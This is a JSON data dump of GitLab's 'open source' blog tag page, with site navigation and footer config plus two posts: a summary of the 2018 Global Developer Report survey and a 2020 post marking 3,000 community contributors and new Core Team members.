[{"data":1,"prerenderedAt":5521},["ShallowReactive",2],{"/en-us/blog/tags/open-source/":3,"navigation-en-us":20,"banner-en-us":438,"footer-en-us":453,"open source-tag-page-en-us":664},{"_path":4,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"content":8,"config":11,"_id":13,"_type":14,"title":15,"_source":16,"_file":17,"_stem":18,"_extension":19},"/en-us/blog/tags/open-source","tags",false,"",{"tag":9,"tagSlug":10},"open source","open-source",{"template":12},"BlogTag","content:en-us:blog:tags:open-source.yml","yaml","Open Source","content","en-us/blog/tags/open-source.yml","en-us/blog/tags/open-source","yml",{"_path":21,"_dir":22,"_draft":6,"_partial":6,"_locale":7,"data":23,"_id":434,"_type":14,"title":435,"_source":16,"_file":436,"_stem":437,"_extension":19},"/shared/en-us/main-navigation","en-us",{"logo":24,"freeTrial":29,"sales":34,"login":39,"items":44,"search":375,"minimal":406,"duo":425},{"config":25},{"href":26,"dataGaName":27,"dataGaLocation":28},"/","gitlab logo","header",{"text":30,"config":31},"Get free trial",{"href":32,"dataGaName":33,"dataGaLocation":28},"https://gitlab.com/-/trial_registrations/new?glm_source=about.gitlab.com&glm_content=default-saas-trial/","free trial",{"text":35,"config":36},"Talk to sales",{"href":37,"dataGaName":38,"dataGaLocation":28},"/sales/","sales",{"text":40,"config":41},"Sign in",{"href":42,"dataGaName":43,"dataGaLocation":28},"https://gitlab.com/users/sign_in/","sign in",[45,89,185,190,296,356],{"text":46,"config":47,"cards":49,"footer":72},"Platform",{"dataNavLevelOne":48},"platform",[50,56,64],{"title":46,"description":51,"link":52},"The most comprehensive AI-powered DevSecOps Platform",{"text":53,"config":54},"Explore our Platform",{"href":55,"dataGaName":48,"dataGaLocation":28},"/platform/",{"title":57,"description":58,"link":59},"GitLab Duo (AI)","Build software faster with AI at every stage of development",{"text":60,"config":61},"Meet GitLab Duo",{"href":62,"dataGaName":63,"dataGaLocation":28},"/gitlab-duo/","gitlab duo ai",{"title":65,"description":66,"link":67},"Why GitLab","10 reasons why Enterprises choose GitLab",{"text":68,"config":69},"Learn more",{"href":70,"dataGaName":71,"dataGaLocation":28},"/why-gitlab/","why gitlab",{"title":73,"items":74},"Get started with",[75,80,85],{"text":76,"config":77},"Platform Engineering",{"href":78,"dataGaName":79,"dataGaLocation":28},"/solutions/platform-engineering/","platform engineering",{"text":81,"config":82},"Developer Experience",{"href":83,"dataGaName":84,"dataGaLocation":28},"/developer-experience/","Developer experience",{"text":86,"config":87},"MLOps",{"href":88,"dataGaName":86,"dataGaLocation":28},"/topics/devops/the-role-of-ai-in-devops/",{"text":90,"left":91,"config":92,"link":94,"lists":98,"footer":167},"Product",true,{"dataNavLevelOne":93},"solutions",{"text":95,"config":96},"View all Solutions",{"href":97,"dataGaName":93,"dataGaLocation":28},"/solutions/",[99,124,146],{"title":100,"description":101,"link":102,"items":107},"Automation","CI/CD and automation to accelerate deployment",{"config":103},{"icon":104,"href":105,"dataGaName":106,"dataGaLocation":28},"AutomatedCodeAlt","/solutions/delivery-automation/","automated software delivery",[108,112,116,120],{"text":109,"config":110},"CI/CD",{"href":111,"dataGaLocation":28,"dataGaName":109},"/solutions/continuous-integration/",{"text":113,"config":114},"AI-Assisted Development",{"href":62,"dataGaLocation":28,"dataGaName":115},"AI assisted development",{"text":117,"config":118},"Source Code Management",{"href":119,"dataGaLocation":28,"dataGaName":117},"/solutions/source-code-management/",{"text":121,"config":122},"Automated Software Delivery",{"href":105,"dataGaLocation":28,"dataGaName":123},"Automated software delivery",{"title":125,"description":126,"link":127,"items":132},"Security","Deliver code faster without compromising security",{"config":128},{"href":129,"dataGaName":130,"dataGaLocation":28,"icon":131},"/solutions/security-compliance/","security and compliance","ShieldCheckLight",[133,136,141],{"text":134,"config":135},"Security & Compliance",{"href":129,"dataGaLocation":28,"dataGaName":134},{"text":137,"config":138},"Software Supply Chain Security",{"href":139,"dataGaLocation":28,"dataGaName":140},"/solutions/supply-chain/","Software supply chain security",{"text":142,"config":143},"Compliance & Governance",{"href":144,"dataGaLocation":28,"dataGaName":145},"/solutions/continuous-software-compliance/","Compliance and governance",{"title":147,"link":148,"items":153},"Measurement",{"config":149},{"icon":150,"href":151,"dataGaName":152,"dataGaLocation":28},"DigitalTransformation","/solutions/visibility-measurement/","visibility and measurement",[154,158,162],{"text":155,"config":156},"Visibility & Measurement",{"href":151,"dataGaLocation":28,"dataGaName":157},"Visibility and Measurement",{"text":159,"config":160},"Value Stream Management",{"href":161,"dataGaLocation":28,"dataGaName":159},"/solutions/value-stream-management/",{"text":163,"config":164},"Analytics & Insights",{"href":165,"dataGaLocation":28,"dataGaName":166},"/solutions/analytics-and-insights/","Analytics and insights",{"title":168,"items":169},"GitLab for",[170,175,180],{"text":171,"config":172},"Enterprise",{"href":173,"dataGaLocation":28,"dataGaName":174},"/enterprise/","enterprise",{"text":176,"config":177},"Small Business",{"href":178,"dataGaLocation":28,"dataGaName":179},"/small-business/","small business",{"text":181,"config":182},"Public Sector",{"href":183,"dataGaLocation":28,"dataGaName":184},"/solutions/public-sector/","public sector",{"text":186,"config":187},"Pricing",{"href":188,"dataGaName":189,"dataGaLocation":28,"dataNavLevelOne":189},"/pricing/","pricing",{"text":191,"config":192,"link":194,"lists":198,"feature":283},"Resources",{"dataNavLevelOne":193},"resources",{"text":195,"config":196},"View all resources",{"href":197,"dataGaName":193,"dataGaLocation":28},"/resources/",[199,232,255],{"title":200,"items":201},"Getting started",[202,207,212,217,222,227],{"text":203,"config":204},"Install",{"href":205,"dataGaName":206,"dataGaLocation":28},"/install/","install",{"text":208,"config":209},"Quick start guides",{"href":210,"dataGaName":211,"dataGaLocation":28},"/get-started/","quick setup checklists",{"text":213,"config":214},"Learn",{"href":215,"dataGaLocation":28,"dataGaName":216},"https://university.gitlab.com/","learn",{"text":218,"config":219},"Product documentation",{"href":220,"dataGaName":221,"dataGaLocation":28},"https://docs.gitlab.com/","product documentation",{"text":223,"config":224},"Best practice videos",{"href":225,"dataGaName":226,"dataGaLocation":28},"/getting-started-videos/","best practice videos",{"text":228,"config":229},"Integrations",{"href":230,"dataGaName":231,"dataGaLocation":28},"/integrations/","integrations",{"title":233,"items":234},"Discover",[235,240,245,250],{"text":236,"config":237},"Customer success stories",{"href":238,"dataGaName":239,"dataGaLocation":28},"/customers/","customer success stories",{"text":241,"config":242},"Blog",{"href":243,"dataGaName":244,"dataGaLocation":28},"/blog/","blog",{"text":246,"config":247},"Remote",{"href":248,"dataGaName":249,"dataGaLocation":28},"https://handbook.gitlab.com/handbook/company/culture/all-remote/","remote",{"text":251,"config":252},"TeamOps",{"href":253,"dataGaName":254,"dataGaLocation":28},"/teamops/","teamops",{"title":256,"items":257},"Connect",[258,263,268,273,278],{"text":259,"config":260},"GitLab Services",{"href":261,"dataGaName":262,"dataGaLocation":28},"/services/","services",{"text":264,"config":265},"Community",{"href":266,"dataGaName":267,"dataGaLocation":28},"/community/","community",{"text":269,"config":270},"Forum",{"href":271,"dataGaName":272,"dataGaLocation":28},"https://forum.gitlab.com/","forum",{"text":274,"config":275},"Events",{"href":276,"dataGaName":277,"dataGaLocation":28},"/events/","events",{"text":279,"config":280},"Partners",{"href":281,"dataGaName":282,"dataGaLocation":28},"/partners/","partners",{"backgroundColor":284,"textColor":285,"text":286,"image":287,"link":291},"#2f2a6b","#fff","Insights for the future of software development",{"altText":288,"config":289},"the source promo card",{"src":290},"/images/navigation/the-source-promo-card.svg",{"text":292,"config":293},"Read the latest",{"href":294,"dataGaName":295,"dataGaLocation":28},"/the-source/","the source",{"text":297,"config":298,"lists":300},"Company",{"dataNavLevelOne":299},"company",[301],{"items":302},[303,308,314,316,321,326,331,336,341,346,351],{"text":304,"config":305},"About",{"href":306,"dataGaName":307,"dataGaLocation":28},"/company/","about",{"text":309,"config":310,"footerGa":313},"Jobs",{"href":311,"dataGaName":312,"dataGaLocation":28},"/jobs/","jobs",{"dataGaName":312},{"text":274,"config":315},{"href":276,"dataGaName":277,"dataGaLocation":28},{"text":317,"config":318},"Leadership",{"href":319,"dataGaName":320,"dataGaLocation":28},"/company/team/e-group/","leadership",{"text":322,"config":323},"Team",{"href":324,"dataGaName":325,"dataGaLocation":28},"/company/team/","team",{"text":327,"config":328},"Handbook",{"href":329,"dataGaName":330,"dataGaLocation":28},"https://handbook.gitlab.com/","handbook",{"text":332,"config":333},"Investor relations",{"href":334,"dataGaName":335,"dataGaLocation":28},"https://ir.gitlab.com/","investor relations",{"text":337,"config":338},"Trust Center",{"href":339,"dataGaName":340,"dataGaLocation":28},"/security/","trust center",{"text":342,"config":343},"AI Transparency Center",{"href":344,"dataGaName":345,"dataGaLocation":28},"/ai-transparency-center/","ai transparency center",{"text":347,"config":348},"Newsletter",{"href":349,"dataGaName":350,"dataGaLocation":28},"/company/contact/","newsletter",{"text":352,"config":353},"Press",{"href":354,"dataGaName":355,"dataGaLocation":28},"/press/","press",{"text":357,"config":358,"lists":359},"Contact us",{"dataNavLevelOne":299},[360],{"items":361},[362,365,370],{"text":35,"config":363},{"href":37,"dataGaName":364,"dataGaLocation":28},"talk to sales",{"text":366,"config":367},"Get help",{"href":368,"dataGaName":369,"dataGaLocation":28},"/support/","get help",{"text":371,"config":372},"Customer portal",{"href":373,"dataGaName":374,"dataGaLocation":28},"https://customers.gitlab.com/customers/sign_in/","customer portal",{"close":376,"login":377,"suggestions":384},"Close",{"text":378,"link":379},"To search repositories and projects, login to",{"text":380,"config":381},"gitlab.com",{"href":42,"dataGaName":382,"dataGaLocation":383},"search login","search",{"text":385,"default":386},"Suggestions",[387,389,393,395,399,403],{"text":57,"config":388},{"href":62,"dataGaName":57,"dataGaLocation":383},{"text":390,"config":391},"Code Suggestions (AI)",{"href":392,"dataGaName":390,"dataGaLocation":383},"/solutions/code-suggestions/",{"text":109,"config":394},{"href":111,"dataGaName":109,"dataGaLocation":383},{"text":396,"config":397},"GitLab on AWS",{"href":398,"dataGaName":396,"dataGaLocation":383},"/partners/technology-partners/aws/",{"text":400,"config":401},"GitLab on Google Cloud",{"href":402,"dataGaName":400,"dataGaLocation":383},"/partners/technology-partners/google-cloud-platform/",{"text":404,"config":405},"Why GitLab?",{"href":70,"dataGaName":404,"dataGaLocation":383},{"freeTrial":407,"mobileIcon":412,"desktopIcon":417,"secondaryButton":420},{"text":408,"config":409},"Start free trial",{"href":410,"dataGaName":33,"dataGaLocation":411},"https://gitlab.com/-/trials/new/","nav",{"altText":413,"config":414},"Gitlab Icon",{"src":415,"dataGaName":416,"dataGaLocation":411},"/images/brand/gitlab-logo-tanuki.svg","gitlab icon",{"altText":413,"config":418},{"src":419,"dataGaName":416,"dataGaLocation":411},"/images/brand/gitlab-logo-type.svg",{"text":421,"config":422},"Get Started",{"href":423,"dataGaName":424,"dataGaLocation":411},"https://gitlab.com/-/trial_registrations/new?glm_source=about.gitlab.com/compare/gitlab-vs-github/","get started",{"freeTrial":426,"mobileIcon":430,"desktopIcon":432},{"text":427,"config":428},"Learn more about GitLab Duo",{"href":62,"dataGaName":429,"dataGaLocation":411},"gitlab duo",{"altText":413,"config":431},{"src":415,"dataGaName":416,"dataGaLocation":411},{"altText":413,"config":433},{"src":419,"dataGaName":416,"dataGaLocation":411},"content:shared:en-us:main-navigation.yml","Main Navigation","shared/en-us/main-navigation.yml","shared/en-us/main-navigation",{"_path":439,"_dir":22,"_draft":6,"_partial":6,"_locale":7,"title":440,"button":441,"image":445,"config":448,"_id":450,"_type":14,"_source":16,"_file":451,"_stem":452,"_extension":19},"/shared/en-us/banner","is now in public beta!",{"text":68,"config":442},{"href":443,"dataGaName":444,"dataGaLocation":28},"/gitlab-duo/agent-platform/","duo banner",{"config":446},{"src":447},"https://res.cloudinary.com/about-gitlab-com/image/upload/v1753720689/somrf9zaunk0xlt7ne4x.svg",{"layout":449},"release","content:shared:en-us:banner.yml","shared/en-us/banner.yml","shared/en-us/banner",{"_path":454,"_dir":22,"_draft":6,"_partial":6,"_locale":7,"data":455,"_id":660,"_type":14,"title":661,"_source":16,"_file":662,"_stem":663,"_extension":19},"/shared/en-us/main-footer",{"text":456,"source":457,"edit":463,"contribute":468,"config":473,"items":478,"minimal":652},"Git is a trademark of Software Freedom Conservancy and our use of 'GitLab' is under license",{"text":458,"config":459},"View page source",{"href":460,"dataGaName":461,"dataGaLocation":462},"https://gitlab.com/gitlab-com/marketing/digital-experience/about-gitlab-com/","page source","footer",{"text":464,"config":465},"Edit this page",{"href":466,"dataGaName":467,"dataGaLocation":462},"https://gitlab.com/gitlab-com/marketing/digital-experience/about-gitlab-com/-/blob/main/content/","web ide",{"text":469,"config":470},"Please contribute",{"href":471,"dataGaName":472,"dataGaLocation":462},"https://gitlab.com/gitlab-com/marketing/digital-experience/about-gitlab-com/-/blob/main/CONTRIBUTING.md/","please contribute",{"twitter":474,"facebook":475,"youtube":476,"linkedin":477},"https://twitter.com/gitlab","https://www.facebook.com/gitlab","https://www.youtube.com/channel/UCnMGQ8QHMAnVIsI3xJrihhg","https://www.linkedin.com/company/gitlab-com",[479,502,559,588,622],{"title":46,"links":480,"subMenu":485},[481],{"text":482,"config":483},"DevSecOps platform",{"href":55,"dataGaName":484,"dataGaLocation":462},"devsecops platform",[486],{"title":186,"links":487},[488,492,497],{"text":489,"config":490},"View plans",{"href":188,"dataGaName":491,"dataGaLocation":462},"view plans",{"text":493,"config":494},"Why Premium?",{"href":495,"dataGaName":496,"dataGaLocation":462},"/pricing/premium/","why premium",{"text":498,"config":499},"Why Ultimate?",{"href":500,"dataGaName":501,"dataGaLocation":462},"/pricing/ultimate/","why ultimate",{"title":503,"links":504},"Solutions",[505,510,513,515,520,525,529,532,536,541,543,546,549,554],{"text":506,"config":507},"Digital transformation",{"href":508,"dataGaName":509,"dataGaLocation":462},"/topics/digital-transformation/","digital transformation",{"text":134,"config":511},{"href":129,"dataGaName":512,"dataGaLocation":462},"security & compliance",{"text":123,"config":514},{"href":105,"dataGaName":106,"dataGaLocation":462},{"text":516,"config":517},"Agile development",{"href":518,"dataGaName":519,"dataGaLocation":462},"/solutions/agile-delivery/","agile delivery",{"text":521,"config":522},"Cloud transformation",{"href":523,"dataGaName":524,"dataGaLocation":462},"/topics/cloud-native/","cloud transformation",{"text":526,"config":527},"SCM",{"href":119,"dataGaName":528,"dataGaLocation":462},"source code management",{"text":109,"config":530},{"href":111,"dataGaName":531,"dataGaLocation":462},"continuous integration & delivery",{"text":533,"config":534},"Value stream management",{"href":161,"dataGaName":535,"dataGaLocation":462},"value stream management",{"text":537,"config":538},"GitOps",{"href":539,"dataGaName":540,"dataGaLocation":462},"/solutions/gitops/","gitops",{"text":171,"config":542},{"href":173,"dataGaName":174,"dataGaLocation":462},{"text":544,"config":545},"Small business",{"href":178,"dataGaName":179,"dataGaLocation":462},{"text":547,"config":548},"Public sector",{"href":183,"dataGaName":184,"dataGaLocation":462},{"text":550,"config":551},"Education",{"href":552,"dataGaName":553,"dataGaLocation":462},"/solutions/education/","education",{"text":555,"config":556},"Financial services",{"href":557,"dataGaName":558,"dataGaLocation":462},"/solutions/finance/","financial services",{"title":191,"links":560},[561,563,565,567,570,572,574,576,578,580,582,584,586],{"text":203,"config":562},{"href":205,"dataGaName":206,"dataGaLocation":462},{"text":208,"config":564},{"href":210,"dataGaName":211,"dataGaLocation":462},{"text":213,"config":566},{"href":215,"dataGaName":216,"dataGaLocation":462},{"text":218,"config":568},{"href":220,"dataGaName":569,"dataGaLocation":462},"docs",{"text":241,"config":571},{"href":243,"dataGaName":244,"dataGaLocation":462},{"text":236,"config":573},{"href":238,"dataGaName":239,"dataGaLocation":462},{"text":246,"config":575},{"href":248,"dataGaName":249,"dataGaLocation":462},{"text":259,"config":577},{"href":261,"dataGaName":262,"dataGaLocation":462},{"text":251,"config":579},{"href":253,"dataGaName":254,"dataGaLocation":462},{"text":264,"config":581},{"href":266,"dataGaName":267,"dataGaLocation":462},{"text":269,"config":583},{"href":271,"dataGaName":272,"dataGaLocation":462},{"text":274,"config":585},{"href":276,"dataGaName":277,"dataGaLocation":462},{"text":279,"config":587},{"href":281,"dataGaName":282,"dataGaLocation":462},{"title":297,"links":589},[590,592,594,596,598,600,602,606,611,613,615,617],{"text":304,"config":591},{"href":306,"dataGaName":299,"dataGaLocation":462},{"text":309,"config":593},{"href":311,"dataGaName":312,"dataGaLocation":462},{"text":317,"config":595},{"href":319,"dataGaName":320,"dataGaLocation":462},{"text":322,"config":597},{"href":324,"dataGaName":325,"dataGaLocation":462},{"text":327,"config":599},{"href":329,"dataGaName":330,"dataGaLocation":462},{"text":332,"config":601},{"href":334,"dataGaName":335,"dataGaLocation":462},{"text":603,"config":604},"Sustainability",{"href":605,"dataGaName":603,"dataGaLocation":462},"/sustainability/",{"text":607,"config":608},"Diversity, inclusion and belonging (DIB)",{"href":609,"dataGaName":610,"dataGaLocation":462},"/diversity-inclusion-belonging/","Diversity, inclusion and belonging",{"text":337,"config":612},{"href":339,"dataGaName":340,"dataGaLocation":462},{"text":347,"config":614},{"href":349,"dataGaName":350,"dataGaLocation":462},{"text":352,"config":616},{"href":354,"dataGaName":355,"dataGaLocation":462},{"text":618,"config":619},"Modern Slavery Transparency Statement",{"href":620,"dataGaName":621,"dataGaLocation":462},"https://handbook.gitlab.com/handbook/legal/modern-slavery-act-transparency-statement/","modern slavery transparency statement",{"title":623,"links":624},"Contact Us",[625,628,630,632,637,642,647],{"text":626,"config":627},"Contact an expert",{"href":37,"dataGaName":38,"dataGaLocation":462},{"text":366,"config":629},{"href":368,"dataGaName":369,"dataGaLocation":462},{"text":371,"config":631},{"href":373,"dataGaName":374,"dataGaLocation":462},{"text":633,"config":634},"Status",{"href":635,"dataGaName":636,"dataGaLocation":462},"https://status.gitlab.com/","status",{"text":638,"config":639},"Terms of use",{"href":640,"dataGaName":641,"dataGaLocation":462},"/terms/","terms of use",{"text":643,"config":644},"Privacy statement",{"href":645,"dataGaName":646,"dataGaLocation":462},"/privacy/","privacy statement",{"text":648,"config":649},"Cookie preferences",{"dataGaName":650,"dataGaLocation":462,"id":651,"isOneTrustButton":91},"cookie preferences","ot-sdk-btn",{"items":653},[654,656,658],{"text":638,"config":655},{"href":640,"dataGaName":641,"dataGaLocation":462},{"text":643,"config":657},{"href":645,"dataGaName":646,"dataGaLocation":462},{"text":648,"config":659},{"dataGaName":650,"dataGaLocation":462,"id":651,"isOneTrustButton":91},"content:shared:en-us:main-footer.yml","Main Footer","shared/en-us/main-footer.yml","shared/en-us/main-footer",{"allPosts":665,"featuredPost":5500,"totalPagesCount":5519,"initialPosts":5520},[666,694,715,737,760,787,810,830,852,874,895,917,938,960,981,1002,1022,1045,1064,1085,1106,1127,1148,1167,1187,1206,1226,1245,1263,1283,1302,1322,1343,1362,1383,1402,1421,1442,1462,1482,1503,1522,1540,1558,1576,1594,1612,1630,1648,1669,1689,1710,1728,1748,1768,1788,1809,1829,1850,1869,1887,1906,1926,1945,1964,1983,2003,2023,2042,2061,2082,2101,2121,2139,2159,2179,2198,2218,2240,2260,2278,2298,2318,2337,2357,2375,2396,2417,2437,2457,2475,2493,2511,2531,2551,2570,2590,2609,2628,2646,2667,2686,2705,2725,2744,2763,2783,2803,2822,2842,2860,2880,2899,2919,2940,2960,2979,2999,3019,3039,3058,3077,3098,3117,3137,3157,3176,3195,3215,3235,3256,3276,3295,3315,3334,3354,3374,3392,3413,3433,3452,3472,3490,3509,3528,3546,3565,3584,3605,3625,3644,3664,3684,3704,3723,3743,3764,3781,3800,3820,3839,3858,3877,3896,3915,3935,3954,3973,3992,4012,4029,4049,4069,4088,4107,4126,4149,4168,4187,4206,4225,4243,4263,4283,4302,4322,4342,4361,4381,4401,4421,4440,4458,4475,4493,4510,4528,4546,4565,4584,4604,4624,4642,4661,4682,4700,4721,4739,4757,4776,4795,4815,4833,4852,4873,4893,4912,4931,4950,4970,4990,5008,5027,5046,5064,5084,5104,5122,5142,5160,5178,5197,5218,5237,5256,5276,5295,5314,5332,5351,5369,5388,5407,5426,5444,5463,5481],{"_path":667,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":668,"content":676,"config":687,"_id":690,"_type":14,"title":691,"_source":16,"_file":692,"_stem":693,"_extension":19},"/en-us/blog/2018-global-developer-report",{"title":669,"description":670,"ogTitle":669,"ogDescription":670,"noIndex":6,"ogImage":671,"ogUrl":672,"ogSiteName":673,"ogType":674,"canonicalUrls":672,"schema":675},"Global Developer Report - 2018 for Open Source & DevOps","We surveyed over 5,000 software professionals to examine current attitudes and perception of the state of culture, workflow, and tooling within IT organizations.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749663993/Blog/Hero%20Images/2018-developer-report-cover.jpg","https://about.gitlab.com/blog/2018-global-developer-report","https://about.gitlab.com","article","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Global Developer Report confirms 2018 is the year for open source and DevOps\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Erica Lindberg\"}],\n        \"datePublished\": \"2018-03-07\",\n      }",{"title":677,"description":670,"authors":678,"heroImage":671,"date":680,"body":681,"category":682,"tags":683},"Global Developer Report confirms 2018 is the year for open source and DevOps",[679],"Erica Lindberg","2018-03-07","\n_Our [2022 Global DevSecOps Survey](https://about.gitlab.com/developer-survey/previous/2022/) is out now! Learn the latest in DevOps insights from over 5,000 DevOps professionals._\n\nFrom the junior developer with just a handful of years’ experience to the software professional who’s been in the game for decades, we set out to see how the people behind the software are dealing with a rapidly changing technology landscape. This year’s survey reveals that unclear direction is a developer’s greatest challenge, IT managers are investing the most in continuous integration and delivery, and nearly all agree that the importance of open source cannot be overstated.\n\n\u003C!--more -->\n\nThe focus of [GitLab’s 2018 Global Developer survey](/developer-survey/previous/2018/) was to understand developers’ attitudes toward their workplace, uncover disparities between developers and their management, and benchmark the state of culture, workflow, and tooling within IT organizations. We asked a broad set of questions covering everything from developers’ opinions on their teams’ ability to collaborate and succeed at work to their preferences on workflow methodology and tooling.\n\n\u003Cdiv style=\"text-align: center\"> 🎙\u003Cstrong>\u003Ca href=\"https://webinars.devops.com/top-5-takeaways-from-the-2018-global-developer-survey\"> Join us March 29 for a live discussion with Alan Shimel of DevOps.com on the top 5 takeaways from the report\u003C/a> \u003C/strong> 🎙 ️\u003C/div>\n\n## Developer satisfaction\n\nWe found that the majority of developers are satisfied with the conditions of their workplace, and managers should focus on improving the planning and testing phases of the development lifecycle. We also found that IT management is more optimistic in their perception of overall workplace satisfaction with roughly 10 percent more respondents agreeing their team is set up to succeed, and that project requirements and deadlines are set up front.\n\n\u003Cimg src=\"/images/blogimages/2018-developer-report-stats_2x.jpg\" alt=\"2018 Developer Report\" style=\"width: 900px;\"/>\n\nDelays during the planning phase emerged as a top challenge for all respondents and unclear direction remains the greatest challenge to getting work done for developers.\n\n## DevOps\n\nCommitment to and demand for DevOps is growing, despite challenges posed by outmoded tooling and cultural resistance to change. Adoption is still in early stages, with 23 percent identifying DevOps as their development methodology, but this is sure to increase with IT management naming it as one of their top three areas for technology investment in 2018. The tide of developer opinion is following suit: we found that the majority of developers agree that a DevOps workflow saves valuable time during the development process. Teams currently practicing DevOps confirm the productivity gains – high performers, who told us they deploy their code on demand, and who estimated that they spend 50 percent or more of their time on new work, report having a clear DevOps culture at rates more than double that of lower-performing teams.\n\n## Open source\n\nOpen source projects like [Kubernetes](/blog/containers-kubernetes-basics/) and [CoreOS](/blog/coreos-acquisition/) have gained a lot of recent attention and this year’s survey underscores the value of creating software in the open. 92 percent of total respondents agree that open source tools are important to software innovation and nearly 50 percent report that most of their tools are open source.\n\n## About the 2018 survey\n\nGitLab surveyed 5,296 software professionals of varying backgrounds and industries around the world. The margin of error is two percent, assuming a population size of 21 million software professionals and 99 percent confidence level.\n\n## Methodology\n\nWe launched this Global Developer Survey on November 17, 2017, collecting responses\nuntil December 18, 2017. During that time, we promoted the survey primarily on GitLab’s\nsocial media channels and newsletter. In order to correct for the gender imbalance\ndeveloping in our survey sample, we made an extra push via Twitter on December 5 to encourage\nwomen involved in the software development lifecycle to take the survey. By the end of the open\nperiod, we achieved approximately 25 percent female respondents, the same percentage of women who currently\nhold computing roles, according to [NCWIT](https://www.ncwit.org/sites/default/files/resources/womenintech_facts_fullreport_05132016.pdf).\n\n| Frequently asked questions |\n| -------- | -------- |\n| **How can I access the report?**   | You can view the complete report [here](/developer-survey/).   |\n| **Are the raw results publicly available?**  | Yes, you can view the raw data [here](https://www.surveymonkey.com/results/SM-G3S6S63P8/).   |\n| **Did only GitLab users take the survey?** | No, it was open to all who work in software production. You can view the survey demographics [here](/developer-survey/).  |\n| **How can I ask questions or give feedback about the survey and results?** | You can direct questions or comments about the survey to [surveys@gitlab.com](mailto:surveys@gitlab.com). |\n| **I’d like to participate in the next survey. Can I sign up for alerts?** | The best way to receive news about the Global Developer Survey is to sign up for our bi-weekly newsletter – you can do that below or visit our [Subscription Center](https://page.gitlab.com/SubscriptionCenter.html). |\n","insights",[684,9,685,686],"developer survey","DevOps","workflow",{"slug":688,"featured":6,"template":689},"2018-global-developer-report","BlogPost","content:en-us:blog:2018-global-developer-report.yml","2018 Global Developer Report","en-us/blog/2018-global-developer-report.yml","en-us/blog/2018-global-developer-report",{"_path":695,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":696,"content":702,"config":709,"_id":711,"_type":14,"title":712,"_source":16,"_file":713,"_stem":714,"_extension":19},"/en-us/blog/3000-contributors-post",{"title":697,"description":698,"ogTitle":697,"ogDescription":698,"noIndex":6,"ogImage":699,"ogUrl":700,"ogSiteName":673,"ogType":674,"canonicalUrls":700,"schema":701},"Celebrating 3,000 wider community contributors","We've reached an important contributor milestone and added two new members to the Core Team.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749678450/Blog/Hero%20Images/blog-header-3000-contributors.png","https://about.gitlab.com/blog/3000-contributors-post","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Celebrating 3,000 wider community contributors\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Ray Paik\"}],\n        \"datePublished\": \"2020-06-23\",\n      }",{"title":697,"description":698,"authors":703,"heroImage":699,"date":705,"body":706,"category":10,"tags":707},[704],"Ray Paik","2020-06-23","\nLike many open source projects, we have a [community dashboard](https://contributors.gitlab.com) at GitLab and one of the metrics that a few of us were occasionally checking on was the number of **Contributors**. This is the number of wider community members who had merge requests (MRs) merged with the `Community contribution` label across all projects at GitLab. There were some virtual high fives a few weeks ago when the number crossed the 3,000 threshold. There is probably a tendency to place oversized importance on nice round numbers, because if you really think about it the GitLab community wasn't any different at 2,999 vs. 3,000 contributors. However, it was a great occasion to celebrate the continued growth of the wider GitLab community.  \n\n![Community dashboard screenshot](https://about.gitlab.com/images/blogimages/3000-contributors/dashboard-screenshot.png){: .shadow.medium.center}\nCommunity dashboard screenshot from April 23, 2020\n{: .note.text-center}\n\nThe past few months have been a challenging time due to Covid-19, and there was talk in open source circles about the pandemic's potential impact on contributions to open source projects. As people were trying to sort out many new challenges in life, it was reasonable to expect that open source contributions might fall lower on the list of priorities. We actually did see a decline in wider community contributions during the last few weeks of March (125 MRs submitted) compared to the previous two weeks (143 MRs submitted). However, the GitLab community seemed to roar back relatively quickly, and the best evidence of that is from our most recent [Hackathon](/community/hackathon/) when my inbox got innundated with [240 MRs submitted](https://gitlab.com/gitlab-com/marketing/community-relations/contributor-program/hackathon/-/issues/35#merge-request-list) over two days. \n\nFirst and foremost, I'm very glad most of the wider community members are doing ok and adjusting to the strange new normal. Moreover, I am grateful that new people are continuing to join and helping to grow the GitLab community with their contributions and enthusiasm even during these challenging times. \n\nWhat all these contributors bring are not just MRs but more importantly valuable feeback and insight that help us improve our product and the community. Some of you may have seen our latest [2020 Global DevSecOps Survey results](/developer-survey/), and one figure that caught my attention was that more than 17% of the respondents actually contribute to GitLab. I hope to see that trend continue.\n\n## Exciting additions to the Core Team\n\nMany of you may already be familar with the [GitLab Core Team](/community/core-team/), but if not, Core Team members are community members who made sustained contribution to GitLab over the years and serve as representatives of the wider contributor community. In keeping with the growth in contributor numbers, I'm happy to report that we are also adding to the GitLab Core Team. \n\nFrom the wider community, I'm excited to introduce [Lee Tickett](https://gitlab.com/leetickett) as a new Core Team member. If you ever posted a question in the [Contributors room on Gitter](https://gitter.im/gitlab/contributors), Lee may have been one of the first to help with your question. Lee has also been very active with [code contributions](https://gitlab.com/groups/gitlab-org/-/merge_requests?scope=all&utf8=%E2%9C%93&state=all&author_username=leetickett) and participating in [issues](https://gitlab.com/groups/gitlab-org/-/issues?scope=all&utf8=%E2%9C%93&state=all&author_username=leetickett). Lee's contribution to GitLab as someone who's been using GitLab for his own company since 2017 has been extremely valuable. When Lee isn't working, contributing, sleeping or eating, you'll likely find him spending time with his family or kicking back in his home bar with some Pac-Man, a game of pool and an ice cold pint.\n\nThe Core Team also includes up to two GitLab team members, and I'm very happy to have [Natalia Tepluhina](/company/team/#ntepluhina) joining as the first female member in the history of the GitLab Core Team. If you submitted frontend related MRs, there's a good chance that Natalia [reviewed and merged your MRs](https://gitlab.com/groups/gitlab-org/-/merge_requests?scope=all&utf8=%E2%9C%93&state=merged&label_name[]=Community%20contribution&assignee_username=ntepluhina). Natalia is also a Core Team member in the Vue.js community and brings a wealth of experience from other open source projects. If you want to meet Natalia in person, she is a frequent speaker at Vue.js events around the world and other Javascript conferences such as [JSHeroes](https://jsheroes.io/) and [JSNation](https://jsnation.com/). \n\n![Core Team pictures](https://about.gitlab.com/images/blogimages/3000-contributors/Core-team-pictures.png){: .shadow.medium.center}\nWelcome Lee and Natalia to the Core Team!\n{: .note.text-center}\n\n## Interested in learning how you can contribute?\n\nA good place to start is the [Contributing to GitLab 